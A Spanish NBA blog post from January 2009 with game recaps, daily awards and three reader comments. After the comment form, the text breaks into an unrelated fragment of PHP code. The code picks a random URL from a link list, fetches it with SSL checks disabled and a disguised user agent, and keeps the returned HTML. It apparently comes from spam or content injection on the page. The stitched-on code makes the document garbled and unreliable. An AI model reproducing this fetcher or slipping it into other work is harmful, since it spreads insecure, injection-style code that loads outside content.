La Crónica (6/1/2009)

07 de January de 2009 por TheDeerHunter

Frustrante tropezón de los Celtics en la prórroga anoche en Charlotte. Venimos diciendo que no preocupa tanto el resultado en sí como determinadas sensaciones que se transmiten. En este caso en concreto, un solar de banco e inexplicable defensa y tiro exterior. Sin embargo, ahora mismo el Este ya no está como para dar concesiones de este tipo y sería un gravísimo error ceder una ventaja campo ante un hipotético enfrentamiento contra Cleveland, que a fecha de hoy todavía no ha perdido en casa. De momento, los Celtics ha perdido el liderato por primera vez en muchísimo tiempo.

Como consuelo los Lakers perdieron la oportunidad de batir una marca histórica de victorias consecutivas en casa. Los angelinos también andan algo justos de fondo de banquillo con las bajas de Farmar, Walton y a partir de anoche, Odom. Con todo, los Hornets llegaron al Staples hiper-motivados tras las últimas derrotas en su particular duelo y los mejores West&Paul de la temporada le ganaron la batalla a Kobe, que fue el único que les plantó cara.

Los más beneficiados de la jornada fueron los Magic que, sin excesivos alardes, vencieron a los Wizards y se ponen a un partido de los Celtics.

En otras guerras de playoffs, los Mavs se llevaron un complicadísimo partido contra los “nuevos” Clippers de Eric Gordon. Nowitzki tiró de galones pero Terry hizo uno de los peores partidos de esta temporada. Por su lado, los Sixers se llevaron el duelo “venido a menos” de la jornada contra unos tristes Rockets en los que únicamente Scola dió una buena imagen.

Finalmente, en la zona baja, Al Jefferson volvió a ganarle la partida a Marc, los Bulls ganaron a los Kings y los Thunder a los Knicks.

PREMIOS:

MVP: Hoy no podemos decantarnos por uno. ¿Qué vale más? ¿Los 40-11 de David West o los 32-15-3-3 de CP3? No sabríamos decirlo. El caso es que ambos le dieron bien la pascua a Phil Jackson.

RoY: Espectacular Eric Gordon para los Clippers con 32 ptos y 6 asistencias pero es que Westbrook hizo 22 ptos, 6 rebotes y 9 asistencias y además se llevó el partido.

La Sorpresa: Pues no le sirvió de demasiado pero que Scola agarre 17 rebotes frente a los 6 de Yao se puede considerar gran sorpresa.

La Decepción: La vuelta de Radmanovic a la titularidad por delante de Ariza u Odom, con lo que nos había costado que saliera de ahí.

El mayor esfuerzo en vano: Esto ya lo hemos vivido. Kobe contra muchos y 39 ptos, 4 rebs y 7 asis que podrían haberle servido para ser MVP de hoy.

Comenta

3 comentarios a esta entrada

  1. Txusma dice:
    #1

    La decepción será desde el punto de vista amarillo no? :]

    Yo en cuanto decepción tb destacaría el horrible partido de Pau tanto en ataque como en defensa si es que se encargó de defender a West y a Terry (ya se comenta en la cronica). Incluso las 9 perdidas de Rondo.

    Y en cuanto a los rookies, partidazo de Marresse Speights secando a Yao y cuajando una buena actuacion ofensiva.

      Citar

  2. couxe dice:
    #2

    Sorprende la facilidad que tienen los Lakers para tirar en muchos de sus partidos uno de los 2 últimos cuartos…

      Citar

  3. MagicJohnson32 dice:
    #3

    Radmanovic es titular porque Ariza le ha pedido a Phil Jackson que lo saque desde el banco. A mí no me parece mal, y menos ahora con la rotación tan corta de qué dispone.

    Pau estuvo absolutamente desastroso. Y su defensa sobre West fue muy poco inteligente. Cada vez que West lanzaba desde 5 metros, anotaba. Y en cambio, cuando le obligaban a botar ya tenía problemas. Pues Pau se dedicaba a flotarle. Y West, a enchufar. Fue surrealista.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>